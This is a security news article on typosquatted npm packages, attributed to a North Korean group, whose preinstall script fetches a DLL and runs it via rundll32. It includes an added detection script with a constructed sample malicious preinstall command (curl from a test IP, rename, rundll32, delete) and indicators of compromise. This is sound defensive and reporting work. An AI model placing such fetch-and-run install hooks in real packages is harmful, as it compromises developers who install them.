North Korean Hackers Attacking Windows Users With Weaponized npm Files

Cybersecurity News. Original news source: cybersecuritynews.com, by Blog Writer.


Scalable package scanning of PyPI and npm with GuardDog, Datadog's open-source package scanner, identified two malicious npm packages linked to a DPRK-aligned threat actor cluster dubbed "Stressed Pungsan."

The cluster overlaps strongly with the actor Microsoft tracks as MOONSTONE SLEET, and the packages are a software supply chain attack vector.

The packages are intended as an initial access vector: installing them fetches and runs a second-stage payload, which in a live campaign could enable data exfiltration, credential theft, and lateral movement within the targeted environment.

Attack Flow

On July 7, 2024, the npm user nagasiren978 uploaded two malicious packages, harthat-hash and harthat-api, which download an additional payload from a suspected North Korean command-and-control (C2) server.

The server delivers a malicious batch script and a DLL; the DLL shows that Windows systems are the intended target, which is consistent with MOONSTONE SLEET, a North Korean threat actor tracked by Microsoft.

Both packages use an npm preinstall lifecycle script to download the malicious DLL from the remote server, execute it with rundll32, and then clean up after themselves.


The packages are nearly identical except for a unique identifier in the download URL, which suggests a campaign that tracks multiple victims and may serve a different payload per identifier.

The package names typosquat the legitimate and widely used Hardhat package, so a developer who mistypes the name pulls the malicious package instead.

The package contents are copied from the well-known node-config repository. After the preinstall script has run, it rewrites package.json to remove the preinstall entry and change the package name to config, so what remains on disk looks like a plain copy of node-config.

The package also includes two extra files, deference.js and pk.json, whose purpose is not analyzed in this excerpt.

The preinstall script downloads the DLL from the remote server disguised as a temporary file (Temp.b), renames it to package.db, and executes it with the rundll32 system utility.

Running a payload through rundll32 is the technique MITRE ATT&CK classifies as System Binary Proxy Execution (T1218.011, Rundll32): a signed Windows binary loads the DLL, so the process tree shows only a trusted executable. The script then deletes the downloaded DLL and restores the original package.json, masking its activity.
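The Node.js script below is an added example, not code from the article or from GuardDog: it statically triages a package.json for the fetch-and-run preinstall pattern described above (a downloader, a raw-IP URL, a rename, a rundll32 invocation on a module that is not a .dll, a cleanup step, and a rewrite of package.json). The rule set, the scoring, the sample package.json contents, the TEST-NET address 192.0.2.10, the id query parameter and the GenerateKeyW entry-point argument are all constructed for illustration; the real script's exact contents are not shown on this page.

```javascript
// Added example: static triage of npm lifecycle scripts for the fetch-and-run
// preinstall pattern described above. Not code from the article or from GuardDog;
// rules, scoring and sample data are constructed for illustration.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each rule tags one behaviour seen in the described script.
const RULES = [
  { tag: "downloader",   re: /\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest|iwr)\b/i },
  { tag: "raw-ip-url",   re: /\bhttps?:\/\/(?:\d{1,3}\.){3}\d{1,3}\b/i },
  { tag: "rename",       re: /\b(ren|rename|mv|move)\b/i },
  { tag: "proxy-exec",   re: /\b(rundll32|regsvr32|mshta|wscript|cscript)\b/i },
  { tag: "cleanup",      re: /\b(del|rm|Remove-Item)\b/i },
  { tag: "self-rewrite", re: /package\.json/i },
];

// rundll32 takes "module,EntryPoint"; a module without a .dll extension
// (the campaign used package.db) is itself worth flagging.
function rundll32NonDllModule(cmd) {
  const m = /\brundll32(?:\.exe)?\s+(?:"([^"]+)"|(\S+))/i.exec(cmd);
  if (!m) return null;
  const module = (m[1] || m[2]).split(",")[0];
  return /\.dll$/i.test(module) ? null : module;
}

function triagePackageJson(text) {
  let pkg;
  try { pkg = JSON.parse(text); } catch { return { name: null, verdict: "unparseable", findings: [] }; }
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const tags = RULES.filter(r => r.re.test(cmd)).map(r => r.tag);
    const oddModule = rundll32NonDllModule(cmd);
    if (oddModule) tags.push(`rundll32-non-dll:${oddModule}`);
    if (tags.length) findings.push({ hook, tags });
  }
  // A downloader and a proxy-execution binary in the same hook is the
  // fetch-and-run pattern; anything else that fired gets a human look.
  const high = findings.some(f => f.tags.includes("downloader") && f.tags.includes("proxy-exec"));
  const verdict = high ? "high" : findings.length ? "review" : "clean";
  return { name: pkg.name ?? null, verdict, findings };
}

// Constructed sample modelled on the behaviour described above; the real
// script is not reproduced on this page. 192.0.2.10 is a TEST-NET address,
// and the entry point name is an assumption.
const SUSPICIOUS_PACKAGE_JSON = JSON.stringify({
  name: "harthat-api",
  version: "1.3.1",
  scripts: {
    preinstall:
      "curl -s -o Temp.b http://192.0.2.10/Temp.b?id=abc123 && ren Temp.b package.db" +
      " && rundll32 package.db,GenerateKeyW && del package.db && copy /y .pkg.bak package.json",
  },
});

// Constructed benign control: a lifecycle hook on its own is not a finding.
const BENIGN_PACKAGE_JSON = JSON.stringify({
  name: "config",
  version: "3.3.12",
  scripts: { test: "mocha", postinstall: "node -e \"console.log('installed')\"" },
});

console.log(JSON.stringify(triagePackageJson(SUSPICIOUS_PACKAGE_JSON), null, 2));
console.log(JSON.stringify(triagePackageJson(BENIGN_PACKAGE_JSON), null, 2));
```

Run it over the package.json of every tarball in a registry mirror or CI cache before `npm install` executes lifecycle scripts; the verdict is deliberately coarse (high, review, clean) because a single tag such as cleanup is common in legitimate build scripts, while a downloader paired with rundll32 or another proxy-execution binary in the same hook is the combination this campaign relied on.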

Figure: List of exported functions (IDA Pro)

The Datadog Security Research team's analysis of the DLL found a seemingly benign binary with no apparent malicious functionality. It exports two functions, one of which, GenerateKeyW, is where malicious code would be expected.

Static and dynamic analysis uncovered no self-modification or harmful behavior in the DLL.

The absence of malicious code suggests the DLL is an incomplete or test version: the threat actor may be experimenting with their infrastructure, or may have made an operational error.

Figure: Disassembly of GenerateKeyW

Indicators of compromise from the analysis include the npm account nagasiren978; the package archives harthat-api-v1.3.1.zip and harthat-hash-v1.3.3.zip, whose contents were likely copied from legitimate projects to appear benign; the payload server IP address 142.111.77.196; the downloaded file name Temp.b (renamed to package.db on disk); and that file's SHA256 hash, d2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277.
